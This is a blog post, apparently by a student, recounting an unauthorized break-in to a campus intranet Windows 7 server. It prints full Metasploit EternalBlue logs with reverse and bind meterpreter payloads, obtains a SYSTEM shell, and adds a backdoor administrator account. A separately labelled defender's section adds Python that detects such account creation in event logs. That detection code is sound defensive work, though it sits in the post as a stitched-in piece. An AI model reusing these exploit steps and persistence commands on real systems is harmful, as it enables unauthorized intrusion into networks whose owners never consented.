Your NUIST intranet still has an exploitable EternalBlue hole...
How it started
While slacking off in a programming class in the Mingde Building, 360 popped up two brute-force alerts in the bottom-right corner.
Inner monologue: a 172.16 subnet? Not Clash (198), not ZeroTier (192), and I haven't started a VM today... could it be the campus intranet?
So I scanned it from my phone with termux (yes, because my laptop doesn't have an nmap setup)
```
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
27000/tcp open flexlm0
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
```
First reaction: whoa, that's a lot of open ports
445? 3389?
I don't know how to use 445, so let's look at 3389 first (I wanted to try weak passwords)
Unexpected find! Windows 7, hmmmmmmmmmmm... I seem to remember there's an EternalBlue thing for that (lol)
Then I won't be polite
Asking the AI
Me: AI, AI, do any of these ports have exploitable vulnerabilities? (jk)
The good news: there really is EternalBlue;
the bad news: I genuinely don't know how to use it.
After some searching (read: prodding the AI), I found a handy tool: Metasploit
Metasploit is a professional penetration-testing platform that packages exploits and payloads as modules.
In plain terms: it bundles detection and exploitation of all sorts of vulnerabilities (including building the payload and the follow-up actions) into modular plugins, offered as a flexible framework to both offensive and defensive users.
It runs on both Windows and Linux, which is very convenient (I went with Linux)
First look at Metasploit
Install:
```
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
```
Initialize msfconsole
```
(3.13.7) root@debian12:~# msfconsole
Metasploit tip: Add routes to pivot through a compromised host using route
add <subnet> <session_id>
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.4.97-dev- ]
+ -- --=[ 2,569 exploits - 1,316 auxiliary - 1,680 payloads ]
+ -- --=[ 432 post - 49 encoders - 13 nops - 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project
```
Once you see this screen, you can happily play with CVEs (x
EternalBlue's identifier is MS17-010; Metasploit's search feature finds the module that can be used.
```
msf > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
...(omitted)
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
```
Seeing Windows 7 cheered me up a bit more. The module exploit/windows/smb/ms17_010_eternalblue is easy to use.
First attempt
Type use exploit/windows/smb/ms17_010_eternalblue to select the module
You get [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp (this will come up again!)
Then type show options to see at a glance how this module is used
```
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.11 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
```
hmmmm... looks like you just set the remote IP and it's a one-click exploit!
```
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.55.5
RHOSTS => 172.16.55.5
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.11:4444
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.55.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[!] 172.16.55.5:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x4DD9B4E4
[*] 172.16.55.5:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.55.5:445 - The target is vulnerable.
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
^C[-] 172.16.55.5:445 - Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
```
Judging from the log it should have worked, so why no response? It hung there for a long time
Looking closer, one line stands out: [*] Started reverse TCP handler on 192.168.1.11:4444
It looks like a reverse shell, but I'm running in a VM... and there's a router in between as well, what now...
Second attempt
Hey, just set up port forwarding and that's it, right?
```
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.11.70.10
LHOST => 10.11.70.10
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[-] Handler failed to bind to 10.11.70.10:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 172.16.55.5:445 - Rex::ConnectionTimeout: The connection with (172.16.55.5:445) timed out.
[*] 172.16.55.5:445 - Scanned 1 of 1 hosts (100% complete)
[-] 172.16.55.5:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[-] Handler failed to bind to 10.11.70.10:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
^C[*] 172.16.55.5:445 - Caught interrupt from the console...
[-] 172.16.55.5:445 - The target is not vulnerable.
^C[*] Exploit completed, but no session was created.
```
Still not working??? I'd configured the port forwarding and everything...
Could the campus firewall policy be interfering?
p.s. It turned out later that my own router wasn't allowing inbound connections; I'd assumed the campus router was blocking my inbound traffic
Third attempt (third time's the charm!)
After some more searching, I found this thing can be switched to an active mode (i.e., the target listens on a port and I connect to it)
Remember the line I flagged above?
```
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
```
Run set PAYLOAD windows/x64/meterpreter/bind_tcp and now the remote host is the one listening on the port~
```
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.55.5
RHOSTS => 172.16.55.5
msf exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.55.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.55.5:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.55.5:445 - The target is vulnerable.
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.16.55.5:4444
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
[*] Sending stage (230982 bytes) to 172.16.55.5
[*] Meterpreter session 1 opened (192.168.1.11:38257 -> 172.16.55.5:4444) at 2025-11-05 12:44:58 +0800
[+] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
```
meterpreter is up! Big win 😋
Then it was the usual routine: getshell, add a user, and I was into RDP~
```
meterpreter > shell
Process 11748 created.
Channel 1 created.
Microsoft Windows [ 汾 6.1.7601]
Ȩ (c) 2009 Microsoft Corporation Ȩ
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ipconfig
ipconfig
Windows IP
̫ 2:
ض DNS . . . . . . . :
IPv6 ַ. . . . . . . . : fe80::909f:b6e0:88d3:237f%13
IPv4 ַ . . . . . . . . . . . . : 172.16.55.5
. . . . . . . . . . . . : 255.255.255.0
Ĭ . . . . . . . . . . . . . : 172.16.55.1
isatap.{2C927202-F205-48DD-84FD-763619F472B4}:
ý ״̬ . . . . . . . . . . . . : ý ѶϿ
ض DNS . . . . . . . :
C:\Windows\system32>sysinfo
sysinfo
'sysinfo' ڲ ⲿ Ҳ ǿ еij
ļ
C:\Windows\system32>exit
exit
meterpreter > sysinfo
Computer : VPC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > shell
Process 12332 created.
Channel 2 created.
Microsoft Windows [ 汾 6.1.7601]
Ȩ (c) 2009 Microsoft Corporation Ȩ
C:\Windows\system32>wmic CPU
wmic CPU
AddressWidth Architecture Availability Caption ConfigManagerErrorCode ConfigManagerUserConfig CpuStatus CreationClassName CurrentClockSpeed CurrentVoltage DataWidth Description DeviceID ErrorCleared ErrorDescription ExtClock Family InstallDate L2CacheSize L2CacheSpeed L3CacheSize L3CacheSpeed LastErrorCode Level LoadPercentage Manufacturer MaxClockSpeed Name NumberOfCores NumberOfLogicalProcessors OtherFamilyDescription PNPDeviceID PowerManagementCapabilities PowerManagementSupported ProcessorId ProcessorType Revision Role SocketDesignation Status StatusInfo Stepping SystemCreationClassName SystemName UniqueId UpgradeMethod Version VoltageCaps
64 9 3 Intel64 Family 6 Model 79 Stepping 1 1 Win32_Processor 1700 64 Intel64 Family 6 Model 79 Stepping 1 CPU0 1 0 0 6 11 GenuineIntel 1700 Intel(R) Xeon(R) CPU E5-2609 v4 @ 1.70GHz 4 4 FALSE 0F8BFBFF000406F1 3 20225 CPU CPU 0 OK 3 Win32_ComputerSystem VPC 1 0
64 9 3 Intel64 Family 6 Model 79 Stepping 1 1 Win32_Processor 1700 64 Intel64 Family 6 Model 79 Stepping 1 CPU1 1 0 0 6 0 GenuineIntel 1700 Intel(R) Xeon(R) CPU E5-2609 v4 @ 1.70GHz 4 4 FALSE 0F8BFBFF000406F1 3 20225 CPU CPU 1 OK 3 Win32_ComputerSystem VPC 1 0
C:\Windows\system32>dxfiag
dxfiag
'dxfiag' ڲ ⲿ Ҳ ǿ еij
ļ
C:\Windows\system32>net user test123 test123456 /add
net user test123 test123456 /add
ɹ ɡ
C:\Windows\system32>net localgroup Administrators test123 /add
net localgroup Administrators test123 /add
ɹ ɡ
```
Nothing much worth looking at above, and it's all mojibake because of the encoding problem...
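A defender's view of that last step, as an added example that is not part of the original post: the `net user ... /add` followed by `net localgroup Administrators ... /add` pair lands in the Windows Security log as event 4720 (user created) followed by 4732 (member added to a local group), and a short gap between the two from a SYSTEM-level process is a strong signal. The sample lines and their simplified `timestamp event_id key=value` layout are constructed here; real exports look different.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines (not real exported events): a simplified
# "timestamp event_id key=value ..." rendering of Windows Security log fields.
# The test123 pair mirrors the write-up; intern01 is a benign, slow admin add.
SAMPLE_EVENTS = """\
2025-11-05T12:45:10 4624 TargetUserName=SYSTEM LogonType=5
2025-11-05T12:46:02 4720 TargetUserName=test123 SubjectUserName=VPC$
2025-11-05T12:46:20 4732 MemberName=test123 TargetUserName=Administrators SubjectUserName=VPC$
2025-11-05T13:10:00 4720 TargetUserName=intern01 SubjectUserName=itadmin
2025-11-05T15:30:00 4732 MemberName=intern01 TargetUserName=Administrators SubjectUserName=itadmin
"""

EVENT_RE = re.compile(r"^(\S+)\s+(\d+)\s+(.*)$")


def parse_event(line):
    """Turn one sample line into a dict with ts, event_id and its key=value fields."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts, event_id, rest = m.groups()
    fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
    fields["ts"] = datetime.fromisoformat(ts)
    fields["event_id"] = int(event_id)
    return fields


def find_rapid_admin_adds(text, window=timedelta(minutes=5)):
    """Flag accounts created (4720) and added to Administrators (4732) within `window`.

    Returns (account, seconds_between, subject, subject_is_machine_account) tuples.
    A subject ending in '$' is the computer account, i.e. the change came from a
    SYSTEM-level process (the meterpreter shell above ran as nt authority\\system).
    Note: real 4732 events often carry only the member SID, which must be resolved first.
    """
    created, hits = {}, []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        if ev["event_id"] == 4720:
            created[ev["TargetUserName"]] = ev
        elif ev["event_id"] == 4732 and ev.get("TargetUserName") == "Administrators":
            origin = created.get(ev.get("MemberName"))
            if origin is None:
                continue
            delta = (ev["ts"] - origin["ts"]).total_seconds()
            if 0 <= delta <= window.total_seconds():
                subject = ev.get("SubjectUserName", "")
                hits.append((ev["MemberName"], delta, subject, subject.endswith("$")))
    return hits
```

Calling `find_rapid_admin_adds(SAMPLE_EVENTS)` flags only test123 (18 seconds apart, made by the machine account); widening the window to hours also surfaces intern01, which is why the window matters.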

Closing thoughts
hmmmmm, I never expected my first real exploitation to be on the campus intranet, or that the school would still have a server running Win7, with no security software installed and every firewall port open (which is the only reason the third attempt succeeded). Truly eye-opening.
There's a MATLAB on the server's D: drive; no idea what this machine is for, I didn't look closely.
I've reported the vulnerability to the school; whether they'll fix it, who knows...